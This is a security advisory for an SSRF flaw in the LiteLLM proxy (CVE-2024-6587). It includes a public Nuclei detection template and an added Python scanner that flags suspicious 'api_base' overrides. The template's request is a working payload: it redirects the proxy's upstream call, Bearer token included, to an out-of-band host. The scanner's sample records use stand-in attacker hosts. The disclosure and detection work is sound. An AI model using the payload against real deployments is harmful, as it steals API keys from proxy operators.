CVE-2024-6587: LiteLLM - Server-Side Request Forgery

Date: 2025-08-01 | Affected software: LiteLLM | PoC: public

Vulnerability description

LiteLLM is vulnerable to Server-Side Request Forgery (SSRF): a request-supplied upstream URL makes the proxy send its outbound call, including the Bearer authorization header, to an arbitrary host, which exposes OpenAI API keys.

PoC code [public]

id: CVE-2024-6587

info:
  name: LiteLLM - Server-Side Request Forgery
  author: pdresearch,iamnoooob,rootxharsh,lambdasawa
  severity: high
  description: |
    LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
  reference:
    - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
  classification:
    epss-score: 0.78552
    epss-percentile: 0.99006
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:439373620
  tags: cve,cve2024,ssrf,openai,litellm,vkev

http:
  - raw:
      - |
        POST /chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "model": "command-nightly",
          "messages": [
            {
              "content": "Hello, how are you?",
              "role": "user"
            }
          ],
          "api_base": "https://{{interactsh-url}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "Bearer"
# digest: 490a00463044022043d0d9242445e5f58a0e6fc28d841f5837b342bc8cf2404e94b289f1460c127602202ab74b433f8f477acf72e4baaef9b5108da36d3f016ae04367b2c959e4374476:922c64590222798bb761d5b6d8e72950
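The template above detects the issue by sending a chat-completion request whose body carries an "api_base" override and then observing the proxy's outbound call, with its Bearer token, at an out-of-band listener. The following is an added defender-side example, not code from LiteLLM or from the Nuclei template: it scans captured request records for the same pattern, flagging any /chat/completions body whose "api_base" points outside an allowlist of expected upstream hosts. The "api_base" field name is taken from the PoC request; the allowlist, the record format and all sample records are constructed assumptions.

```python
"""Added example (not part of LiteLLM or the Nuclei template): flag
chat-completion requests that try to redirect the proxy's upstream call
via an "api_base" override to a non-allowlisted host."""
import json
from urllib.parse import urlsplit

# Constructed assumption: the upstream hosts this deployment is expected to reach.
ALLOWED_API_HOSTS = {"api.openai.com", "api.cohere.ai"}


def api_base_override(body: str):
    """Return the raw "api_base" string from a JSON body, or None if the body is
    not a JSON object or carries no string "api_base" field."""
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        return None
    if not isinstance(data, dict):
        return None
    value = data.get("api_base")
    return value if isinstance(value, str) else None


def override_host(api_base: str):
    """Hostname of an api_base URL, or None when no host can be parsed
    (e.g. a bare name without a scheme, which urlsplit does not treat as a netloc)."""
    return urlsplit(api_base).hostname


def is_suspicious_request(path: str, body: str, allowed=ALLOWED_API_HOSTS) -> bool:
    """True when a chat-completion request overrides api_base to a host that is
    not on the allowlist. An unparseable host counts as not allowed, so a bare
    "evil.example" is flagged rather than silently passed."""
    if "/chat/completions" not in path:
        return False
    api_base = api_base_override(body)
    if api_base is None:
        return False
    host = override_host(api_base)
    return host is None or host.lower() not in allowed


def scan(records):
    """Return the ids of records that look like api_base SSRF attempts."""
    return [r["id"] for r in records if is_suspicious_request(r["path"], r["body"])]


# Constructed sample request records (not real traffic).
SAMPLE_REQUESTS = [
    {"id": "r1", "path": "/chat/completions",
     "body": '{"model": "gpt-4", "messages": [{"role": "user", "content": "hi"}]}'},
    {"id": "r2", "path": "/chat/completions",
     "body": '{"model": "gpt-4", "messages": [], "api_base": "https://api.openai.com"}'},
    {"id": "r3", "path": "/chat/completions",
     "body": '{"model": "command-nightly", "messages": [], "api_base": "https://oob.listener.example"}'},
    {"id": "r4", "path": "/chat/completions",
     "body": '{"model": "command-nightly", "messages": [], "api_base": "evil.example"}'},
    {"id": "r5", "path": "/chat/completions", "body": "not json at all"},
    {"id": "r6", "path": "/models", "body": '{"api_base": "https://oob.listener.example"}'},
]

if __name__ == "__main__":
    for rid in scan(SAMPLE_REQUESTS):
        print("suspicious api_base override in request", rid)
```

Only r3 and r4 are reported: r2 overrides api_base but to an allowlisted host, r5 is not JSON, and r6 is not a chat-completion request. In a real deployment the allowlist should be derived from the proxy's configured upstreams, and a positive hit is worth correlating with outbound connection logs from the proxy host, since the harm is the Authorization header leaving with the forwarded request.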